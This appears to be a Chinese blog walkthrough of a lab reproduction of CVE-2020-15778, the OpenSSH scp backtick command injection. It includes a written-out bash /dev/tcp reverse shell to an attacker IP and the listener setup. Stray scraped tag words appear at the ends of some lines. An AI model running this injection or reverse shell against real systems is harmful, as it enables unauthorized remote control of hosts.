CVE-2020-15778 OpenSSH命令注入漏洞復現

1、漏洞概要

OpenSSH 8.3p1及以前版本中的scp容許在scp.c遠程功能中注入命令,攻擊者可利用該漏洞執行任意命令。目前絕大多數linux系統受影響。linux

參考連接:https://github.com/cpandya2909/CVE-2020-15778git

2、環境部署

攻擊機:Centos7.6 10.10.10.133github

靶機:Centos7.6 10.10.10.134shell

3、漏洞復現

首先確認靶機OpenSSH版本是否在漏洞影響範圍安全

1)正常遠程拷貝

scp是 linux 系統下基於 ssh 登錄進行安全的遠程文件拷貝命令,命令格式:bash

scp local_file remote_username@remote_ip:remote_file 

攻擊機在當前目錄下建立一個拷貝用的測試文件test.txtssh

遠程拷貝文件tcp

能夠看到,在靶機上對比以前已經有拷貝過去的文件了測試

 2)命令注入攻擊

經過特殊符號 ` 進行遠程命令注入攻擊blog

命令執行成功

 

便可以在``內實現任意遠程命令執行,甚至是從網上下載準備好的後門或者其餘惡意程序

3)反彈shell利用

命令格式:

bash -i >&/dev/tcp/10.10.10.133/6666 0>&1

命令解析

命令 解釋
bash -i 產生一個交互式bash
>& /dev/tcp/ip/port 創建TCP鏈接,並將標準輸出和錯誤重定向到TCP鏈接
0>&1 從TCP鏈接獲取輸入

 

 

 

 

 

打開攻擊機監聽端口,如6666

firewall-cmd --zone=public --add-port=6666/tcp --permanent

新開一個窗口開啓監聽

攻擊機原窗口進行反彈shell命令注入攻擊

 執行成功,成功回顯

4、總結

此漏洞利用有必定的侷限性,須要經過SSH身份認證。可是該漏洞影響範圍很是廣,且官方還沒有發佈安全更新補丁,請持續關注。

相關文章
相關標籤/搜索